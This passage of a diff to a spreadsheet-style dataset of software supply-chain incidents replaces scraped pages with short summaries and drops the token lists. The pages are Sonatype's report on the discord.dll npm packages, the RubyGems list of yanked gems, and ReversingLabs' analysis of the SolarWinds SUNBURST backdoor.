'fallguy', 'package', 'simple', 'structure', 'discorddll', 'multiple', 'file', 'long', 'time', 'elusive', 'package', 'suspicious', 'package', 'author', 'page', 'mysterious', 'file', 'ex', 'malware', 'virustotal', 'appjs', 'file', 'package', 'line', 'discordapp', 'detail', 'install', 'fire', 'postinstall', 'script', 'mysterious', 'dropperexe', 'alarm', 'bell', 'sonatype', 'research', 'team', 'package', 'complex', 'fallguy', 'successor', 'recent', 'state', 'software', 'supply', 'chain', 'report', 'increase', 'malicious', 'code', 'injection', 'project', 'software', 'supply', 'chain', 'attack', 'first', 'time', 'attack', 'counterfeit', 'component', 'discovery', 'counterfeit', 'component', 'discorddll', 'fallguy', 'malware', 'headline', 'damage', 'possible', 'software', 'supply', 'chain', 'adequate', 'protection', 'place', 'spec', 'stat', 'interesting', 'specification', 'statistic', 'package', 'discorddll', 'month', 'download', 'discordapp', 'month', 'wsbdjs', 'hour', 'download', 'day', 'timeline', 'malicious', 'package', 'discovery', 'reporting', 'suspicious', 'package', 'wsbdjs', 'malware', 'detection', 'bot', 'hour', 'time', 'package', 'package', 'suspicious', 'author', 'portfolio', 'next', 'generation', 'nexus', 'intelligence', 'suspicious', 'component', 'quarantine', 'research', 'team', 'package', 'datum', 'identifier', 'team', 'malicious', 'package', 'public', 'disclosure', 'blog', 'post', 'reason', 'public', 'disclosure', 'center', 'fact', 'package', 'hundred', 'download', 'realtime', 'install', 'package', 'risk', 'machine', 'software', 'supply', 'chain', 'standard', 'vulnerability', 'disclosure', 'timeline', 'case', 'visibility', 'sonatype', 'customer', 'package', 'customer', 'counterfeit', 'component', 'discorddll', 'other', 'worldclass', 'open', 'source', 'intelligence', 'malware', 'detection', 'technology', 'developer', 'customer', 'software', 'supply', 'chain', 'infection', 'sonatype', 'customer', 'code', 'vulnerable', 'sonatype', 'free', 'nexus', 'vulnerability', 'scanner', 'nexus', 'intelligence', 'insight', 'deep', 'dive', 'vulnerability', 'subscribe', 'nexus', 'intelligence', 'insight', 'press', 'tag', 'vulnerability', 'nexus', 'intelligence', 'product', 'nexus', 'intelligence', 'insight', 'researcher', 'sonatype', 'engineer', 'passion', 'perpetual', 'learning', 'work', 'expert', 'analysis', 'medium', 'outlet', 'expertise', 'vulnerability', 'research', 'reverse', 'engineering', 'software', 'development', 'spare', 'time', 'vulnerability', 'wide', 'range', 'audience', 'author', 'topic', 'post', 'open', 'source', 'attacker', 'next', 'package', 'curious', 'case', 'csrfmagic', 'case', 'study', 'supply', 'chain', 'sharma', 'overload', 'crisis', 'vulnerability', 'management', 'package', 'vulnerability', 'connect', 'ssrf', 'vulnerability', 'vulnerability', 'software', 'supply', 'chain', 'platform', 'platform', 'overview', 'firewall', 'repository', 'lifecycle', 'sbom', 'manager', 'pricing', 'product', 'container', 'auditor', 'legal', 'pack', 'lifecycle', 'foundation', 'solution', 'role', 'innovation', 'developer', 'legal', 'compliance', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'community', 'free', 'tool', 'nexus', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'resource', 'update', 'blog', 'whitepaper', 'ebook', 'customer', 'story', 'partner', 'partner', 'partner', 'amazon', 'customer', 'portal', 'training', 'workshop', 'documentation', 'sonatype', 'customer', 'support', 'company', 'career', 'newsroom', 'contact', 'press', 'center', 'late', 'software', 'news', 'event', 'term', 'service', 'privacy', 'policy', 'modern', 'slavery', 'statement', 'event', 'term', 'condition', 'personal', 'information', 'copyright', 'sonatype', 'right', 'thirdparty', 'code', 'sonatype', 'sonatype', 'nexus', 'trademark', 'sonatype', 'trademark', 'foundation', 'trademark', 'property', 'respective', 'owner']</t>
         </is>
       </c>
     </row>
@@ -4457,17 +3853,12 @@
       </c>
       <c r="C155" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert rubygems rubygemsorg public notifications fork star code issues pull requests discussions actions wiki insights additional navigation options code issues pull requests discussions actions wiki insights gems yanked accounts locked jump bottom aditya prakash edited page revisions select scenarios published could yanked account locked rubygemsorg team members creates backdoor remote code execution steals sensitive information host like http cookies contains code malware wiki document yanked gems accounts locked along rationale action account locked petergibbons2 yanked httpsrubygemsorggemsprettycolorversions081 reason obfuscated code beautification matching malware code httpsgithubcom365sectwannacryblobmasterwannacryvbs account locked mikejudge yanked httpsrubygemsorggemsrubybitcoinversions0020 reason obfuscated code beautification matching malware code httpsgithubcom365sectwannacryblobmasterwannacryvbs february accounts locked petergibbons jimcarrey yanked httpsgistgithubcomcolbyswandale11dadff435b02f887fc68178cd4fb0dc april yanked related httpsgithubcomrubygemsrubygemsorgissues1959 scriptyankgem yanking honeybadger initializing honeybadger error tracker ruby ship version460 frameworkrails level1 pid1361 yanking newer version available please upgrade ruby done yanked basicauthable related httpshelprubygemsorgdiscussionsproblems37137 yanking basicauthable done accounts locked davidspade mclovin mwmanning yanked restclient related httpsgithubcomrubygemsrubygemsorgissues2097 scriptyankuser mclovin yanking bitcoinvanity yanking litacoin yanking comingsoon yanking omniauthamazon scriptyankuser davidspade yanking cronparser yanking coinbase yanking blockchainwallet yanking awesomebot yanking dogecoin yanking capistranocolors july account locked homografo gems yanked gems shaggy owner reason names invalid levenshtein rule related httpsgistgithubcomsonalkr1320af1746c14b42a41e01d20fffbed585b june account locked shaggy gems yanked gems shaggy owner reason gems contain code crypto mining cookiepassword stealing related rubygemsrubygemsorg2034 june account locked cryptice yanked versions passen reason latest version passen code cookie stealing related helprubygemsorg36541 toggle tagle contents pages home brainstorming contribution guidelines create development setup gems yanked accounts locked february april july june june help standup gemcutter owner problem webhooks ideas clone wiki locally footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>Ruby gem ruby-bitcoin contained obfuscated code on beautification was matching malware code https://github.com/365sec/twannacry/blob/master/wannacry.vbs</t>
         </is>
       </c>
       <c r="D155" t="inlineStr">
         <is>
           <t>https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#08-dec-2020</t>
-        </is>
-      </c>
-      <c r="E155" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'rubygem', 'public', 'notification', 'star', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'gem', 'account', 'jump', 'bottom', 'aditya', 'prakash', 'page', 'revision', 'scenario', 'account', 'rubygemsorg', 'team', 'member', 'backdoor', 'remote', 'code', 'execution', 'sensitive', 'information', 'host', 'http', 'cookie', 'code', 'malware', 'document', 'gem', 'account', 'rationale', 'action', 'account', 'reason', 'code', 'beautification', 'account', 'reason', 'code', 'beautification', 'account', 'petergibbon', 'jimcarrey', 'scriptyankgem', 'honeybadger', 'honeybadger', 'error', 'pid1361', 'new', 'version', 'available', 'basicauthable', 'basicauthable', 'account', 'restclient', 'bitcoinvanity', 'litacoin', 'yanking', 'comingsoon', 'cronparser', 'coinbase', 'dogecoin', 'yanking', 'capistranocolor', 'account', 'homografo', 'gem', 'gem', 'owner', 'reason', 'invalid', 'account', 'shaggy', 'gem', 'gem', 'owner', 'reason', 'gem', 'code', 'mining', 'account', 'cryptice', 'version', 'passen', 'reason', 'late', 'version', 'code', 'cookie', 'toggle', 'content', 'page', 'home', 'brainstorming', 'contribution', 'guideline', 'development', 'setup', 'gem', 'account', 'idea', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -4484,17 +3875,12 @@
       </c>
       <c r="C156" t="inlineStr">
         <is>
-          <t>buyer’s guide software supply chain download sboms moment hear make actionable save spot gartner® report mitigate enterprise software supply chain risks insights solutions software supply chain spectra assure procurement spectra assure build release automate support triage incident response siemsoar protect cloud file shares optimize hunting ransomware feed malware hunting sandbox email intelligence platform intelligence platform microsoft sentinel product technology product technology titanium platform spectra assure software supply chain reversinglabs intelligence reversinglabs elastic infrastructure reversinglabs analysis hunting free open source yara rules integrations partners partners become partner value added partners marketplaces alliances reversinglabs synopsys resources resources blog content library webinars software deconstruction demo series reversingglass concepts explained conversinglabs podcast labs yara rules demo videos learning reversinglabs company company leadership careers series investment company news events events press press releases news demo contact support login blog developer portal search reversinglabs blog research december attack solarwinds nextlevel stealth sunburst supply chain attack behind breach solarwinds took sophistication patience blog author tomislav peričin chief software architect cofounder reversinglabs read executive summary reversinglabs shows conclusive details orion software build code signing infrastructure compromised discloses compilation artifacts confirming orion source code directly modified include malicious backdoor discloses software delivery artifacts confirming backdoored orion software patch delivered existing software release management system proposes novel approach detect prevent future software supply chain attacks summary solarwinds company makes monitoring management solutions become latest target sophisticated supply chain attack multiple solarwinds orion software updates released march june found contain backdoor code enables attackers conduct surveillance execute arbitrary commands affected systems reversinglabs research anatomy supply chain attack unveiled conclusive details showing orion software build code signing infrastructure compromised source code affected library directly modified include malicious backdoor code compiled signed delivered existing software patch release management system type attack software supply chain means novel different time level stealth attackers used remain undetected long possible attackers blended affected code base mimicking software developers’ coding style naming standards consistently demonstrated significant number functions added turn orion software backdoor organization uses hiding software developers piecing together story outside incident difficult however trail breadcrumbs left behind sufficient glean insight methods attackers used compromise orion software release process investigation typically starts what’s known case list backdoored software libraries file named solarwindsorioncorebusinesslayerdll within orion platform software package update solarwindscorev201945220hotfix5msp first version known contain malicious backdoor code library thoroughly analyzed fireeyes technical blog describes backdoor behavior well however draw conclusions attackers’ patience sophistication state orion software build system analysis metadata first version contain malicious backdoor code outlined fireeye blog previous version tampered attackers version october version slightly modified doesn’t contain malicious backdoor code contain class host future figure empty class prior backdoor code addition first code modification clearly proof concept three step action plan compromise build system inject code verify signed packages going appear client side expected objectives attackers proved supply chain could compromised started planning real attack payload name class orionimprovementbusinesslayer chosen deliberately blend rest code also fool software developers anyone auditing binaries class many methods uses found orion software libraries even thematically fitting code found within libraries implies intent remain stealthy also attackers highly familiar code base compare instance functions compute userid orion client code function tries read previously computed value registry creates guid user figure getorcreateuserid orion client mimicking attackers created implementations functions also compute userid named functions even using guid format type later figure getorcreateuserid backdoor class spot code performs similar function original pattern naming classes members variables appropriately visible everywhere backdoored code really method called collectsystemdescription uploadsystemdescription used orion client library code like iorionimprovementbusinesslayer interface attackers mimicked name class placed backdoor code however code added library doesn’t magically execute attackers still need call somehow done tells build system compromised figure refreshinternal clean software version figure refreshinternal backdoored library code highlighted additional functionality attackers small block code creates thread runs backdoor orion software performing background inventory checks location perfect kind code added original code already dealing longrunning background tasks like rest attackerinjected code blends techniques decompile code inject something recompile code afterwards wasn’t case inventorymanager class modified source code level file ultimately built regular orion software build system confirmed looking timestamps backdoored binary libraries within package patch file delivers figure backdoored library compile time figure backdoored library symbols time figure backdoored library signing time timestamps file headers codeviews match perfectly revision number means file compiled clean build since file signed crosssigned timestamping timestamps within headers reliably validated crosssigning timestamp controlled remote server outside build environment can’t tampered signing occurred within minute library compilation leaves time attackers able monitor build system replace binary change metadata match perfectly simplest timestamp artifacts align perfectly attackers’ code injected directly source existing build signing system perform compilation release processes defined orion software developers figure backdoored library file modification time finally patch file contains archive preserves local last modified time library assuming build system running gmt1 time zone also confirms file last modified signing files surrounding backdoored library belong namespace also compiled time since don’t depend wouldn’t built time unless build system running complete build since patch file signed signing time matches contents package confirms patch file created machine rest build question source control compromised attackers code placed build machine unfortunately something metadata can’t reveal artifacts preserved software compilation attackers went trouble ensure code looks like belongs within code base certainly done hide code audit software developers certain build infrastructure compromised addition digital signing system forced sign untrusted code there’s evidence moment solarwinds certificates used sign malicious code possibility excluded precaution certificates keys used build system revoked hiding analysts consider second type customer runs orion software within environment software supply chain attack like work attackers need keep radar evade millions dollars investment need fool highly specialized detection software people detect threats proactively hunt anomalies months pull trick attackers need strike right balance staying hidden achieving objective figure backdoored library obfuscated strings large budgets come quite perks able internal hunting certainly there’s nothing hunters like look anomalies data yara rules finding things laying string “select win32systemdriver” probably found quite attackers chose hide noisy strings combination compression base64 encoding step approach necessary also quite hunting rules look base64 variants aforementioned string reversing steps c07nsu0uudbsccvkz1uiz8wznoopriwusc11kcossy0caa found becomes “select win32systemdriver” hunting rules stay none wiser string obfuscation repeated throughout code that’s balance standing software developer review fooling systems gamble paid attackers preventing supply chain attacks companies focused securing software supply chain talking reducing risks types attacks pose faroff many ways we’re still problem awareness phase unfortunate incidents like help draw attention multifaceted problem equally affects ship software consume reversinglabs research development teams pride thinking problems become widespread concerns goal built many prototypes products solutions address problems software supply chain protection certainly huge problem waiting solved internally weve defined product strategies protecting sides equation developer user envisioned system able scan “gold” software release images prior release consumption system purposely built look software tampering digital signing build quality issues ingrained continuous software development release cycle bring issues surface provide guidance eliminating aspect system ability pinpoint behavioral differences compiled software versions dubbed static behavioral indicators descriptions translate underlying code actions effects could machine runs layed difference added green removed code effects software behavior changes become apparent backdoored solarwinds binary raises number alarms would made possible catch supply chain attack much sooner figure static behavior diff following list highlights important static code behavior changes first tampered version contains malicious backdoor code reads information running processes application suddenly become aware running processes environment highly unusual mature code bases functionality typically added major releases there’s typically feature planned behind kind code there’s usually good reason addition type interprocess communication desire control running processes scenario unplanned addition would cause concern contains references md5sha1 algorithm framework classes highly unusual hashing algorithms like sha1 typically implemented solve specific problem it’s either sort content validation authentication uniqueness check usually mapped highlevel requirement tracked back feature modification request similar development task contains references kernel32dll advapi32dll native windows referencing native windows apis library sudden unusual underlying code interacts system necessity even managed applications better ways example provided language runtimes typically achieve effect developers require native functions without deal type uncertainty regardless supply chain attack context developers refer code smell enumerates system information using windows management instrumentation system functions enable application information status local remote computer systems administrators functions manage computer systems remotely understanding functionality added suddenly crucial unlikely scope application changed dramatically interaction remote computer systems become part tasks goal retrieve something local system might already code information enumerates tampers useraccount privileges looking user account privileges typically first step elevated running code elevated privileges done perform limited action like copying files restricted folders manipulating running processes changing system setting actions must firm reason behind adding mature code base least questionable developer made aware type thing sign tampers system shutdown sticking theme unnecessary privileges application flag able shutdown reboot computer isn’t something that’s added code unexpectedly feature takes coordination multiple code components usually implemented single location within application appear elsewhere definitely cause concern regardless side software deployment process finds report impact software code changes invaluable piece information software developers lead informed decisions underlying code behavior software consumers ensure detection anomalous code additions either impact system transformative software deployment processes serves verification barrier make harder kinds software supply chain attacks recur control mechanisms needed sunburst illustrates next generation compromises thrive access sophistication patience companies operate valuable businesses produce software critical customers inspecting software monitoring updates signs tampering malicious unwanted additions must part risk management process type tampering exploits software distributions trusted traditional software stack unique comparison known malicious implants distributions could easily inspected perimeter control hiding plain sight behind globally known software brand trusted businesscritical process gives method access phishing campaign could dream achieve cyber frameworks nist document need continuous risk management inspection data software turn includes need third party open source software whether built internally externally continually inspected tampering malicious content unwanted characteristics clash organization’s acceptable policies reversinglabs always thinking challenges ahead we’d happy discuss viewpoints offer solutions towards reducing organizational software supply chain risks please touch solve problems together referenced files file name solarwindsorioncorebusinesslayerdll version timestamp hash 5e643654179e8b4cfe1d3c1906a90a4c8d611cea note file contains placeholder orionimprovementbusinesslayer class file name solarwindsorioncorebusinesslayerdll version timestamp hash 76640508b1e7759e548771a5359eaed353bf1eec note first known instance backdoored library file name solarwindsorioncorebusinesslayerdll version timestamp hash 2f1a5a7411d015d01aaee4535835400191645023 note contains malicious backdoor code file name solarwindsorioncorebusinesslayerdll version timestamp hash d130bd75645c2433f88ac03e73395fba172ef676 note contains malicious backdoor code file name solarwindscorev201945220hotfix5msp version timestamp ‎tue ‎march ‎2020 hash 1b476f58ca366b54f34d714ffce3fd73cc30db1a note hotfix patch containing first known backdoor instance file name solarwindsorionimprovementclientdll version timestamp ‎wed hash 22719783b2469ad312a40c1b200dd24d6a03618d note attacker reference file containing iorionimprovementbusinesslayer interface speed trends understand landscape state software supply chain plus learn reversinglabs spectra assure software supply chain keep learning update understanding buyers guide software supply chain join webinar need upgrade appsec report take action state supply chain join discussion state software supply chain webinar gartners guidance managing software supply chain risk tags research appsec supply chain blog posts appsec supply chain march software supply chain numbers stats matter understand state software supply chain takeaways recent research surveys application development pros read research march suspicious nuget package grabs data industrial systems espionage long driver malicious cyber campaigns heres research team knows suspicious sqzrframework480 campaign read devsecops march memorysafe languages design insights lessons learned memory safety stubborn dangerous software weaknesses insights takeaways google report issue read topics blog posts appsec supply chain devsecops research operations products technology company events follow youtube linkedin subscribe best blog delivered inbox weekly stay date trends analysis best practices across intelligence software supply chain special reports state software supply chain january latest blog posts securing medical devices sboms conversations hunting software supply chain reproducible builds graduate software supply chain glassboard conversations reversinglabs field ciso matt rose software package deconstruction video conferencing software analyzing risks software supply chain software supply chain hotline need immediate assistance software supply chain issue contact sscs incident response blog webinars demo videos events news glossary careers contact privacy policy cookies rights reserved reversinglabs</t>
+          <t>An Orion software patch was delivered through its existing software release management system that included a backdoor that appears to have been inserted via a build system compromise.</t>
         </is>
       </c>
       <c r="D156" t="inlineStr">
         <is>
           <t>https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth</t>
-        </is>
-      </c>
-      <c r="E156" t="inlineStr">
-        <is>
-          <t>['buyer', 'guide', 'software', 'supply', 'chain', 'download', 'moment', 'actionable', 'spot', 'report', 'enterprise', 'software', 'supply', 'chain', 'risk', 'insight', 'solution', 'software', 'supply', 'chain', 'procurement', 'spectra', 'build', 'release', 'automate', 'support', 'triage', 'incident', 'response', 'protect', 'cloud', 'file', 'share', 'ransomware', 'feed', 'sandbox', 'email', 'intelligence', 'platform', 'intelligence', 'platform', 'product', 'technology', 'product', 'technology', 'titanium', 'platform', 'assure', 'software', 'supply', 'chain', 'elastic', 'infrastructure', 'analysis', 'free', 'open', 'source', 'yara', 'rule', 'partner', 'partner', 'partner', 'value', 'partner', 'marketplace', 'alliance', 'resource', 'resource', 'blog', 'content', 'library', 'software', 'deconstruction', 'demo', 'series', 'reversingglass', 'concept', 'rule', 'video', 'company', 'company', 'leadership', 'career', 'series', 'investment', 'company', 'news', 'event', 'event', 'press', 'release', 'news', 'demo', 'contact', 'support', 'login', 'blog', 'developer', 'portal', 'search', 'reversinglab', 'blog', 'research', 'attack', 'nextlevel', 'sunburst', 'supply', 'chain', 'attack', 'breach', 'solarwind', 'sophistication', 'patience', 'blog', 'author', 'chief', 'software', 'architect', 'cofounder', 'executive', 'summary', 'reversinglab', 'conclusive', 'detail', 'orion', 'software', 'code', 'signing', 'infrastructure', 'compilation', 'artifact', 'orion', 'code', 'malicious', 'backdoor', 'software', 'delivery', 'artifact', 'orion', 'software', 'patch', 'software', 'release', 'management', 'system', 'novel', 'approach', 'future', 'software', 'supply', 'chain', 'attack', 'company', 'management', 'solution', 'late', 'target', 'sophisticated', 'supply', 'chain', 'multiple', 'solarwind', 'orion', 'software', 'update', 'backdoor', 'code', 'attacker', 'surveillance', 'arbitrary', 'command', 'system', 'research', 'anatomy', 'supply', 'chain', 'attack', 'conclusive', 'detail', 'orion', 'software', 'code', 'signing', 'infrastructure', 'source', 'code', 'library', 'malicious', 'backdoor', 'code', 'software', 'patch', 'release', 'management', 'system', 'type', 'attack', 'software', 'supply', 'chain', 'novel', 'different', 'time', 'level', 'stealth', 'attacker', 'undetected', 'possible', 'attacker', 'code', 'base', 'software', 'developer', 'style', 'naming', 'standard', 'significant', 'number', 'function', 'turn', 'orion', 'software', 'backdoor', 'organization', 'hiding', 'software', 'developer', 'story', 'incident', 'difficult', 'trail', 'breadcrumb', 'sufficient', 'insight', 'method', 'attacker', 'compromise', 'orion', 'software', 'release', 'process', 'investigation', 'case', 'list', 'software', 'library', 'file', 'solarwindsorioncorebusinesslayerdll', 'orion', 'platform', 'software', 'package', 'update', 'solarwindscorev201945220hotfix5msp', 'first', 'version', 'malicious', 'backdoor', 'code', 'library', 'blog', 'backdoor', 'behavior', 'conclusion', 'attacker', 'patience', 'sophistication', 'state', 'orion', 'software', 'build', 'system', 'analysis', 'metadata', 'first', 'version', 'malicious', 'backdoor', 'code', 'blog', 'previous', 'version', 'attacker', 'version', 'version', 'malicious', 'backdoor', 'code', 'class', 'host', 'future', 'figure', 'empty', 'class', 'prior', 'backdoor', 'code', 'addition', 'first', 'code', 'modification', 'proof', 'concept', 'step', 'action', 'plan', 'compromise', 'build', 'system', 'inject', 'code', 'verify', 'package', 'client', 'side', 'objective', 'attacker', 'supply', 'chain', 'real', 'attack', 'payload', 'name', 'class', 'orionimprovementbusinesslayer', 'rest', 'code', 'software', 'developer', 'binary', 'class', 'many', 'method', 'orion', 'software', 'library', 'fitting', 'code', 'library', 'intent', 'stealthy', 'familiar', 'code', 'base', 'instance', 'function', 'compute', 'userid', 'code', 'function', 'value', 'registry', 'user', 'figure', 'client', 'attacker', 'implementation', 'function', 'userid', 'function', 'guid', 'format', 'type', 'late', 'figure', 'getorcreateuserid', 'backdoor', 'class', 'spot', 'code', 'similar', 'function', 'original', 'pattern', 'naming', 'class', 'member', 'visible', 'code', 'collectsystemdescription', 'uploadsystemdescription', 'orion', 'client', 'iorionimprovementbusinesslayer', 'interface', 'attacker', 'name', 'class', 'backdoor', 'code', 'library', 'attacker', 'call', 'build', 'system', 'refreshinternal', 'clean', 'software', 'version', 'figure', 'refreshinternal', 'library', 'code', 'additional', 'functionality', 'attacker', 'small', 'block', 'code', 'thread', 'run', 'backdoor', 'orion', 'software', 'background', 'inventory', 'check', 'location', 'perfect', 'kind', 'code', 'original', 'code', 'background', 'task', 'rest', 'code', 'technique', 'code', 'recompile', 'code', 'case', 'inventorymanager', 'class', 'source', 'code', 'level', 'file', 'regular', 'orion', 'software', 'build', 'system', 'timestamp', 'binary', 'library', 'package', 'patch', 'file', 'figure', 'library', 'compile', 'time', 'figure', 'library', 'symbol', 'time', 'figure', 'library', 'signing', 'time', 'timestamp', 'file', 'header', 'revision', 'number', 'file', 'clean', 'build', 'file', 'crosssigned', 'timestamp', 'header', 'remote', 'server', 'build', 'environment', 'signing', 'minute', 'library', 'compilation', 'time', 'attacker', 'able', 'build', 'system', 'binary', 'change', 'simple', 'timestamp', 'artifact', 'attacker', 'code', 'source', 'build', 'signing', 'system', 'compilation', 'release', 'process', 'orion', 'software', 'developer', 'library', 'file', 'modification', 'time', 'file', 'archive', 'preserve', 'local', 'last', 'time', 'library', 'build', 'system', 'time', 'zone', 'file', 'last', 'signing', 'file', 'library', 'namespace', 'time', 'time', 'system', 'complete', 'build', 'patch', 'file', 'signing', 'time', 'content', 'package', 'patch', 'file', 'machine', 'rest', 'build', 'question', 'source', 'control', 'attacker', 'code', 'build', 'machine', 'artifact', 'software', 'compilation', 'attacker', 'trouble', 'code', 'code', 'base', 'code', 'audit', 'software', 'developer', 'certain', 'build', 'infrastructure', 'addition', 'digital', 'signing', 'system', 'sign', 'untrusted', 'code', 'evidence', 'moment', 'certificate', 'sign', 'malicious', 'code', 'possibility', 'precaution', 'certificate', 'key', 'build', 'system', 'hiding', 'analyst', 'second', 'type', 'customer', 'orion', 'software', 'environment', 'software', 'supply', 'chain', 'attack', 'work', 'attacker', 'radar', 'million', 'dollar', 'investment', 'specialized', 'detection', 'software', 'people', 'threat', 'hunt', 'anomaly', 'month', 'trick', 'attacker', 'right', 'balance', 'objective', 'figure', 'library', 'string', 'large', 'budget', 'perk', 'able', 'internal', 'hunting', 'hunter', 'anomaly', 'datum', 'yara', 'rule', 'thing', 'string', 'win32systemdriver', 'quite', 'attacker', 'noisy', 'string', 'combination', 'compression', 'base64', 'encoding', 'step', 'approach', 'necessary', 'hunting', 'rule', 'base64', 'variant', 'string', 'step', 'c07nsu0uudbsccvkz1uiz8wznoopriwusc11kcossy0caa', 'rule', 'none', 'wise', 'string', 'obfuscation', 'code', 'balance', 'standing', 'software', 'developer', 'review', 'fooling', 'system', 'gamble', 'attacker', 'supply', 'chain', 'attack', 'company', 'software', 'supply', 'chain', 'risk', 'type', 'attack', 'many', 'way', 'problem', 'awareness', 'phase', 'unfortunate', 'incident', 'help', 'attention', 'multifaceted', 'problem', 'ship', 'software', 'research', 'development', 'team', 'thinking', 'problem', 'widespread', 'concern', 'goal', 'many', 'prototype', 'product', 'solution', 'problem', 'software', 'supply', 'chain', 'protection', 'huge', 'problem', 'product', 'strategy', 'side', 'equation', 'developer', 'user', 'system', 'able', 'gold', 'software', 'release', 'image', 'consumption', 'system', 'look', 'software', 'digital', 'signing', 'build', 'quality', 'issue', 'continuous', 'software', 'development', 'release', 'cycle', 'issue', 'surface', 'guidance', 'aspect', 'system', 'ability', 'behavioral', 'difference', 'software', 'version', 'static', 'behavioral', 'indicator', 'description', 'code', 'action', 'effect', 'run', 'difference', 'green', 'code', 'effect', 'software', 'behavior', 'change', 'apparent', 'number', 'alarm', 'possible', 'catch', 'supply', 'chain', 'attack', 'static', 'behavior', 'diff', 'list', 'important', 'static', 'code', 'behavior', 'change', 'version', 'malicious', 'backdoor', 'code', 'information', 'running', 'process', 'application', 'aware', 'running', 'process', 'environment', 'unusual', 'mature', 'code', 'basis', 'functionality', 'major', 'release', 'feature', 'kind', 'code', 'good', 'reason', 'addition', 'type', 'interprocess', 'communication', 'control', 'running', 'process', 'scenario', 'unplanned', 'addition', 'concern', 'reference', 'algorithm', 'framework', 'class', 'unusual', 'hashing', 'algorithm', 'specific', 'problem', 'content', 'validation', 'authentication', 'uniqueness', 'check', 'highlevel', 'requirement', 'feature', 'modification', 'request', 'similar', 'development', 'task', 'reference', 'native', 'native', 'window', 'sudden', 'unusual', 'code', 'system', 'necessity', 'application', 'well', 'way', 'example', 'language', 'runtime', 'effect', 'developer', 'native', 'function', 'deal', 'type', 'uncertainty', 'supply', 'chain', 'attack', 'context', 'developer', 'code', 'smell', 'system', 'information', 'window', 'management', 'instrumentation', 'system', 'function', 'application', 'information', 'status', 'local', 'remote', 'computer', 'system', 'administrator', 'function', 'computer', 'system', 'functionality', 'crucial', 'unlikely', 'scope', 'application', 'interaction', 'remote', 'computer', 'system', 'part', 'task', 'goal', 'local', 'system', 'information', 'tamper', 'useraccount', 'privilege', 'user', 'account', 'privilege', 'first', 'step', 'code', 'privilege', 'limited', 'action', 'file', 'folder', 'running', 'process', 'system', 'action', 'reason', 'mature', 'code', 'base', 'least', 'questionable', 'developer', 'aware', 'type', 'thing', 'sign', 'tamper', 'system', 'shutdown', 'theme', 'unnecessary', 'privilege', 'application', 'flag', 'able', 'shutdown', 'reboot', 'computer', 'code', 'feature', 'coordination', 'multiple', 'code', 'component', 'single', 'location', 'application', 'concern', 'regardless', 'side', 'software', 'deployment', 'process', 'report', 'impact', 'software', 'code', 'invaluable', 'piece', 'information', 'software', 'developer', 'informed', 'decision', 'code', 'behavior', 'software', 'consumer', 'detection', 'anomalous', 'code', 'addition', 'impact', 'system', 'transformative', 'software', 'deployment', 'process', 'verification', 'barrier', 'hard', 'kind', 'software', 'supply', 'chain', 'attack', 'control', 'mechanism', 'sunburst', 'next', 'generation', 'compromise', 'access', 'sophistication', 'patience', 'company', 'valuable', 'business', 'software', 'critical', 'customer', 'software', 'monitoring', 'sign', 'malicious', 'unwanted', 'addition', 'risk', 'management', 'process', 'type', 'tampering', 'software', 'distribution', 'traditional', 'software', 'stack', 'unique', 'comparison', 'malicious', 'implant', 'distribution', 'perimeter', 'control', 'plain', 'sight', 'software', 'brand', 'businesscritical', 'process', 'method', 'access', 'phishing', 'campaign', 'cyber', 'framework', 'nist', 'document', 'continuous', 'risk', 'management', 'inspection', 'datum', 'software', 'turn', 'third', 'party', 'open', 'source', 'software', 'malicious', 'content', 'unwanted', 'characteristic', 'organization', 'acceptable', 'policy', 'challenge', 'happy', 'viewpoint', 'solution', 'organizational', 'software', 'supply', 'chain', 'risk', 'problem', 'file', 'file', 'name', 'note', 'file', 'placeholder', 'orionimprovementbusinesslayer', 'class', 'file', 'name', 'hash', 'instance', 'library', 'file', 'name', 'hash', 'note', 'malicious', 'backdoor', 'code', 'file', 'name', 'note', 'malicious', 'backdoor', 'code', 'file', 'name', 'solarwindscorev201945220hotfix5msp', 'version', 'timestamp', 'hash', 'patch', 'backdoor', 'instance', 'file', 'name', 'solarwindsorionimprovementclientdll', 'version', 'hash', 'attacker', 'reference', 'file', 'iorionimprovementbusinesslayer', 'interface', 'speed', 'trend', 'landscape', 'state', 'software', 'supply', 'chain', 'spectra', 'assure', 'software', 'supply', 'chain', 'update', 'understanding', 'buyer', 'software', 'supply', 'chain', 'webinar', 'upgrade', 'report', 'action', 